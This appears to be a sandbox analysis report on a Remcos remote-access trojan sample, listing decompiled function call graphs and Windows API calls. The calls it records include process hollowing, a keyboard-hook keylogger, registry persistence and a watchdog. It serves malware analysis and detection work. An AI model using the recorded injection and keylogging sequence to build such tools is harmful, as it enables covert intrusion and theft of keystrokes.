DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47406->47415 47409 41c4db 47410->47340 47411->47355 47412->47350 47413->47323 47414->47406 47415->47409 47416->47373 47418->46733 47419->46759 47420->46758 47421->46747 47422->46751 47423->46757 47425 410b83 47424->47425 47561 412268 RegCreateKeyA 47425->47561 47427 410b8a 47428 410b90 47427->47428 47429 410ba2 OpenMutexA 47427->47429 47430 410bb9 CloseHandle 47429->47430 47431 410c3e 47429->47431 47432 402073 28 API calls 47430->47432 47433 4020bf 11 API calls 47431->47433 47434 410bcf 47432->47434 47435 410c47 47433->47435 47436 402073 28 API calls 47434->47436 47439 41a20f 32 API calls 47435->47439 47437 410bdf 47436->47437 47438 4194da 79 API calls 47437->47438 47441 410be4 47438->47441 47440 410c5c 47439->47440 47442 401f66 11 API calls 47440->47442 47443 402073 28 API calls 47441->47443 47445 410c65 47442->47445 47444 410bf3 47443->47444 47446 402073 28 API calls 47444->47446 47447 419f23 GetCurrentProcess 47445->47447 47448 410bfe 47446->47448 47449 410c6a 47447->47449 47450 4194da 79 API calls 47448->47450 47451 410cc6 47449->47451 47452 410c6e 47449->47452 47453 410c03 CreateThread 47450->47453 47454 40415e 28 API calls 47451->47454 47455 40415e 28 API calls 47452->47455 47456 410c28 47453->47456 47608 411253 61 API calls 47453->47608 47457 410cd4 47454->47457 47458 410c7f 47455->47458 47459 411f34 3 API calls 47456->47459 47461 40415e 28 API calls 47457->47461 47462 40415e 28 API calls 47458->47462 47460 410c2f 47459->47460 47460->47428 47465 410e75 OpenProcess 47460->47465 47463 410cea 47461->47463 47464 410c95 47462->47464 47601 402f85 28 API calls 47463->47601 47600 402f85 28 API calls 47464->47600 47470 410e92 47465->47470 47468 410cf8 47471 401ef3 28 API calls 47468->47471 47469 410ca0 47472 401ef3 28 API calls 47469->47472 47603 41239a 30 API calls 47470->47603 47474 410d03 47471->47474 47475 410cab 47472->47475 47478 401ee9 11 API calls 47474->47478 47476 401ee9 11 API calls 47475->47476 47480 410cb4 47476->47480 47477 410e99 47481 410e9e 47477->47481 47479 410d0f 47478->47479 47482 401ee9 11 API calls 47479->47482 47483 401ee9 11 API calls 47480->47483 47596 410ea4 47481->47596 47485 410cbd 47482->47485 47483->47485 47487 401ee9 11 API calls 47485->47487 47488 410d21 47487->47488 47489 40415e 28 API calls 47488->47489 47490 410d38 47489->47490 47564 4112e7 47490->47564 47493 401ee9 11 API calls 47494 410d4f 47493->47494 47495 40415e 28 API calls 47494->47495 47496 410d5d 47495->47496 47497 4112e7 28 API calls 47496->47497 47498 410d6b 47497->47498 47499 401ee9 11 API calls 47498->47499 47500 410d74 47499->47500 47501 40415e 28 API calls 47500->47501 47502 410d82 47501->47502 47503 4112e7 28 API calls 47502->47503 47504 410d90 47503->47504 47505 401ee9 11 API calls 47504->47505 47517 410d99 47505->47517 47506 410de3 47507 402073 28 API calls 47506->47507 47508 410df2 47507->47508 47509 402073 28 API calls 47508->47509 47511 410e01 47509->47511 47510 401e45 22 API calls 47510->47517 47512 4194da 79 API calls 47511->47512 47513 410e06 CloseHandle 47512->47513 47602 4112e2 11 API calls 47513->47602 47516 410e1e 47518 401ee9 11 API calls 47516->47518 47517->47506 47517->47510 47519 410e3c 47517->47519 47575 41642d 47517->47575 47520 410e27 47518->47520 47521 402073 28 API calls 47519->47521 47522 401fb8 11 API calls 47520->47522 47523 410e4b 47521->47523 47524 410e30 47522->47524 47525 402073 28 API calls 47523->47525 47524->47428 47526 410e5a 47525->47526 47527 4194da 79 API calls 47526->47527 47528 410e5f Sleep 47527->47528 47528->47481 47531 40e1a8 47529->47531 47530 411f34 3 API calls 47530->47531 47531->47530 47533 40e24e 47531->47533 47535 40e1da 47531->47535 47536 40e23e Sleep 47531->47536 47532 408098 28 API calls 47532->47535 47534 408098 28 API calls 47533->47534 47538 40e25b 47534->47538 47535->47532 47535->47536 47544 401ee9 11 API calls 47535->47544 47547 402073 28 API calls 47535->47547 47551 41215f 14 API calls 47535->47551 47609 40bc59 111 API calls ___scrt_fastfail 47535->47609 47610 419bca 28 API calls 47535->47610 47611 412204 14 API calls 47535->47611 47536->47531 47612 419bca 28 API calls 47538->47612 47541 40e267 47613 412204 14 API calls 47541->47613 47544->47535 47545 40e27a 47546 401ee9 11 API calls 47545->47546 47548 40e286 47546->47548 47547->47535 47549 402073 28 API calls 47548->47549 47550 40e297 47549->47550 47552 41215f 14 API calls 47550->47552 47551->47535 47553 40e2aa 47552->47553 47614 4112b5 TerminateProcess WaitForSingleObject 47553->47614 47555 40e2b2 ExitProcess 47562 412280 RegSetValueExA RegCloseKey 47561->47562 47563 4122aa 47561->47563 47562->47563 47563->47427 47565 4112f4 47564->47565 47566 41135a 47565->47566 47569 411304 47565->47569 47567 411374 47566->47567 47606 4113dc 28 API calls 47566->47606 47607 411581 11 API calls 47567->47607 47573 41133c 47569->47573 47604 4113dc 28 API calls 47569->47604 47572 410d46 47572->47493 47605 411581 11 API calls 47573->47605 47576 41645a 8 API calls 47575->47576 47577 41677e 47576->47577 47578 4164c7 ___scrt_fastfail 47576->47578 47577->47517 47578->47577 47579 41652d CreateProcessW 47578->47579 47580 416563 VirtualAlloc Wow64GetThreadContext 47579->47580 47581 4167b8 GetLastError 47579->47581 47582 416591 ReadProcessMemory 47580->47582 47583 416782 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 47580->47583 47581->47577 47582->47583 47584 4165b7 NtCreateSection 47582->47584 47583->47577 47584->47583 47585 4165df 47584->47585 47586 4165ff NtMapViewOfSection 47585->47586 47587 4165ee NtUnmapViewOfSection 47585->47587 47588 416623 VirtualFree NtClose TerminateProcess 47586->47588 47589 41666b GetCurrentProcess NtMapViewOfSection 47586->47589 47587->47586 47588->47576 47590 416666 47588->47590 47589->47583 47591 416698 _Yarn 47589->47591 47590->47577 47592 416734 WriteProcessMemory 47591->47592 47593 416757 Wow64SetThreadContext 47591->47593 47592->47583 47594 416753 47592->47594 47593->47583 47595 416770 ResumeThread 47593->47595 47594->47593 47595->47577 47595->47583 47597 410ea8 OpenProcess WaitForSingleObject CloseHandle 47596->47597 47597->47597 47598 410ed1 47597->47598 47598->47597 47599 410b5c 141 API calls 47598->47599 47599->47598 47600->47469 47601->47468 47602->47516 47603->47477 47604->47573 47605->47572 47606->47567 47607->47572 47610->47535 47611->47535 47612->47541 47613->47545 47614->47555

                                                                                  Executed Functions

                                                                                  Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                                                  • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                                                  • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                                                  • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                                                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule$LibraryLoad
                                                                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                                                                  • API String ID: 551388010-2474455403
                                                                                  • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                                  • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                                                                  • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                                                                  • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E
                                                                                  Function 0041642D Relevance: 59.8, APIs: 29, Strings: 5, Instructions: 289nativelibraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 420 41642d-416456 421 41645a-4164c1 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 420->421 422 4164c7-4164ce 421->422 423 4167be 421->423 422->423 424 4164d4-4164db 422->424 425 4167c0-4167ca 423->425 424->423 426 4164e1-4164e3 424->426 426->423 427 4164e9-416516 call 434c30 * 2 426->427 427->423 432 41651c-416527 427->432 432->423 433 41652d-41655d CreateProcessW 432->433 434 416563-41658b VirtualAlloc Wow64GetThreadContext 433->434 435 4167b8 GetLastError 433->435 436 416591-4165b1 ReadProcessMemory 434->436 437 416782-4167b6 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 434->437 435->423 436->437 438 4165b7-4165d9 NtCreateSection 436->438 437->423 438->437 439 4165df-4165ec 438->439 440 4165ff-416621 NtMapViewOfSection 439->440 441 4165ee-4165f9 NtUnmapViewOfSection 439->441 442 416623-416660 VirtualFree NtClose TerminateProcess 440->442 443 41666b-416692 GetCurrentProcess NtMapViewOfSection 440->443 441->440 442->421 444 416666 442->444 443->437 445 416698-41669c 443->445 444->423 446 4166a5-4166c3 call 4346b0 445->446 447 41669e-4166a2 445->447 450 416705-41670e 446->450 451 4166c5-4166d3 446->451 447->446 453 416710-416716 450->453 454 41672e-416732 450->454 452 4166d5-4166f8 call 4346b0 451->452 465 4166fa-416701 452->465 453->454 455 416718-41672b call 416841 453->455 456 416734-416751 WriteProcessMemory 454->456 457 416757-41676e Wow64SetThreadContext 454->457 455->454 456->437 460 416753 456->460 457->437 461 416770-41677c ResumeThread 457->461 460->457 461->437 464 41677e-416780 461->464 464->425 465->450
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000,?,00472200), ref: 00416474
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00416477
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection,?,00472200), ref: 00416488
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041648B
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection,?,00472200), ref: 0041649C
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041649F
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose,?,00472200), ref: 004164B0
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004164B3
                                                                                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,?,?,?,?,00472200), ref: 00416555
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004,?,?,?,?,?,00472200), ref: 0041656D
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 00416583
                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,?,?,?,?,?,?,00472200), ref: 004165A9
                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004165D1
                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 004165F9
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00416619
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,00472200), ref: 0041662B
                                                                                  • NtClose.NTDLL(?), ref: 00416635
                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 0041663F
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040,?,?,?,?,?,00472200), ref: 0041667F
                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,00472200), ref: 0041668A
                                                                                  • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00416749
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00416766
                                                                                  • ResumeThread.KERNELBASE(?), ref: 00416773
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,00472200), ref: 0041678A
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00472200), ref: 00416795
                                                                                  • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041679C
                                                                                  • NtClose.NTDLL(?), ref: 004167A6
                                                                                  • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,00472200), ref: 004167B0
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00472200), ref: 004167B8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                  • API String ID: 3150337530-3035715614
                                                                                  • Opcode ID: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
                                                                                  • Instruction ID: 94204e0ceb90eb3d518cc699b6b418d02f123724867831e7a48fec904b930286
                                                                                  • Opcode Fuzzy Hash: d10bf65b43118d9f3602471ab8893a8a2e2c8af733416bb1b6f525cf71852451
                                                                                  • Instruction Fuzzy Hash: 9CA18E71604300AFDB109F64DC85F6B7BE8FB48749F00092AF695D62A1E7B8EC44CB5A
                                                                                  Function 00410B5C Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                                                                    • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00412276
                                                                                    • Part of subcall function 00412268: RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004,?,?,?,00410B8A,0046403C,00000000), ref: 00412291
                                                                                    • Part of subcall function 00412268: RegCloseKey.KERNELBASE(?,?,?,?,00410B8A,0046403C,00000000), ref: 0041229C
                                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                                                                  • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                  • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                                                                  • API String ID: 3018269243-1736093966
                                                                                  • Opcode ID: a9a082d2b9503b939e9f38d19e6741529602a6272246fb768263f7b74fab03aa
                                                                                  • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                                                                  • Opcode Fuzzy Hash: a9a082d2b9503b939e9f38d19e6741529602a6272246fb768263f7b74fab03aa
                                                                                  • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                                                                  Function 00409340 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1411 409340-409357 1412 409359-409373 GetModuleHandleA SetWindowsHookExA 1411->1412 1413 4093bb-4093cb GetMessageA 1411->1413 1412->1413 1416 409375-4093b9 GetLastError call 419b16 call 4052dd call 402073 call 4194da call 401fb8 1412->1416 1414 4093e7 1413->1414 1415 4093cd-4093e5 TranslateMessage DispatchMessageA 1413->1415 1417 4093e9-4093ee 1414->1417 1415->1413 1415->1414 1416->1417
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                                                                  • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                                                                  • GetLastError.KERNEL32 ref: 00409375
                                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                                                                  • TranslateMessage.USER32(?), ref: 004093D2
                                                                                  • DispatchMessageA.USER32(?), ref: 004093DD
                                                                                  Strings
                                                                                  • Keylogger initialization failure: error , xrefs: 00409389
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                  • String ID: Keylogger initialization failure: error
                                                                                  • API String ID: 3219506041-952744263
                                                                                  • Opcode ID: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
                                                                                  • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                                                                  • Opcode Fuzzy Hash: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
                                                                                  • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                                                                                  Function 0040E18D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 90sleepCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00411F34: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                                                                    • Part of subcall function 00411F34: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                                                                    • Part of subcall function 00411F34: RegCloseKey.KERNELBASE(?), ref: 00411F7D
                                                                                  • Sleep.KERNELBASE(00000BB8), ref: 0040E243
                                                                                  • ExitProcess.KERNEL32 ref: 0040E2B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                  • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                                                                  • API String ID: 2281282204-1386060931
                                                                                  • Opcode ID: e948d9216449ccf846751e4fdf3bee74e6ed24c53a5a704cb6257ab68b354c3b
                                                                                  • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                                                                  • Opcode Fuzzy Hash: e948d9216449ccf846751e4fdf3bee74e6ed24c53a5a704cb6257ab68b354c3b
                                                                                  • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                                                                                  Function 00404F31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(?), ref: 00404F61
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 00404FC0
                                                                                  Strings
                                                                                  • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                  • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                  • API String ID: 2532271599-507513762
                                                                                  • Opcode ID: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
                                                                                  • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                                                                                  • Opcode Fuzzy Hash: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
                                                                                  • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
                                                                                  Function 004315EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,01597620), ref: 004315FE
                                                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1815803762-0
                                                                                  • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                                  • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                                                                  • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                                                                  • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                                                                  Function 004195F8 Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetComputerNameExW.KERNELBASE(00000001,?,00000037,00471FFC), ref: 00419615
                                                                                  • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Name$ComputerUser
                                                                                  • String ID:
                                                                                  • API String ID: 4229901323-0
                                                                                  • Opcode ID: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
                                                                                  • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
                                                                                  • Opcode Fuzzy Hash: df11981a8253a9f6cfa01e36e72ce3640b108b9b137393204108e0effccf0179
                                                                                  • Instruction Fuzzy Hash: 7C01FF7290011CABCB04EBD5DC45EDEB7BCEF44319F10016AB505B61A5EEB46A89CB98
                                                                                  Function 00424A66 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_400000_AddInProcess32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: recv
                                                                                  • String ID:
                                                                                  • API String ID: 1507349165-0
                                                                                  • Opcode ID: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
                                                                                  • Instruction ID: 0df3b2746f7319e4a339c8fc0296cb6b5099ceb5184c402daa9575d879af207d
                                                                                  • Opcode Fuzzy Hash: 3ba0adabb739ddff39a3f19a3894bbfe9ce5bc94458df24d68493e41c2bfa472
                                                                                  • Instruction Fuzzy Hash: 81B09B75105201BFC6150750CD0486E7DA597C8381B40491CB14641171C535C4505715
                                                                                  Function 0040D3F0 Relevance: 72.5, APIs: 17, Strings: 24, Instructions: 774COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
